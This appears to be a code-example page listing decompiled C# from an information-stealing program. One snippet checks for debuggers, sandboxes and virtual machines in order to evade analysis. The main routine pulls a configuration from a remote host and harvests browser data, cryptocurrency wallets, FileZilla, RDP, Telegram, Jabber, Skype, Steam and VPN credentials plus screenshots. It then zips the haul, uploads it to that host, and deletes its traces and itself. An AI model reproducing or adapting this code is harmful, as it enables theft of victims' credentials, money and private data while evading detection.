Exemplo n.º 1
0
 // Token: 0x06000095 RID: 149 RVA: 0x0000ABA6 File Offset: 0x00008DA6
 public static bool GetCheckVMBot()
 {
     return(AntiVM.IsDebuggerAttached(Process.GetCurrentProcess()) || AntiVM.SBieDLL() || AntiVM.IsRdpAvailable || AntiVM.GetDetectVirtualMachine());
 }
Exemplo n.º 2
0
        private static void Main(string[] args)
        {
            bool flag = File.Exists(Program.path2);

            if (flag)
            {
                Environment.Exit(0);
            }
            bool flag2 = !AntiVM.GetCheckVMBot();

            if (!flag2)
            {
                Environment.Exit(0);
            }
            string text    = "http://almazscss.website/";
            string text2   = new WebClient().DownloadString(text + "cfg.php");
            string defpath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "/Windows";

            Directory.CreateDirectory(defpath);
            Browsers.Steal(Program.path);
            dnschange.dns("8.8.8.8");
            bool flag3 = text2[4].ToString() == "1";

            if (flag3)
            {
                filezilla.file();
                rdp.Rdp();
            }
            hwid.GetHWID();
            hwid.getprocesses();
            bool flag4 = text2[0].ToString() == "1";

            if (flag4)
            {
                crypto.DirSearch(Environment.GetFolderPath(Environment.SpecialFolder.Desktop));
                crypto.DirSearch(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData));
                crypto.DirSearch(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData));
                crypto.DirSearch("C:\\Users\\" + Environment.UserName + "\\Downloads");
            }
            jabber.jab();
            telegram.telegramData();
            ScreenShot.Screenshot();
            hwid.getprogrammes();
            Files.Steam(Program.steamm);
            skype.skypelog();
            bool flag5 = text2[2].ToString() == "1";

            if (flag5)
            {
                nord.vpn();
                protonvpn.pr0t0nvpn();
                ovpn.openvpn();
            }
            int    steam   = count.GetSteam();
            int    jabber  = count.GetJabber();
            int    crypto  = count.GetCrypto();
            int    desktop = count.GetDesktop();
            int    discord = count.GetDiscord();
            string text3   = trash.rndname(20);

            string[] files = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData));
            foreach (string text4 in files)
            {
                bool flag6 = Path.GetFileName(text4).StartsWith("System_");
                if (flag6)
                {
                    File.Delete(text4);
                }
            }
            using (WebClient webClient = new WebClient())
            {
                webClient.DownloadFile(text + "ICSharpCode.SharpZipLib.dll", Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "/ICSharpCode.SharpZipLib.dll");
                trash.Zip(text3, Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), defpath);
            }
            trash.s3nder(string.Concat(new string[]
            {
                text,
                "antivirus.php?hwid=",
                text3,
                "&crypto=",
                crypto.ToString(),
                "&jabber=",
                jabber.ToString(),
                "&steam=",
                steam.ToString(),
                "&desktop=",
                desktop.ToString(),
                "&discord=",
                discord.ToString()
            }), Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "/" + text3 + ".zip");
            Directory.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "/Windows", true);
            File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "/" + text3 + ".zip");
            killerr.SelfDel();
        }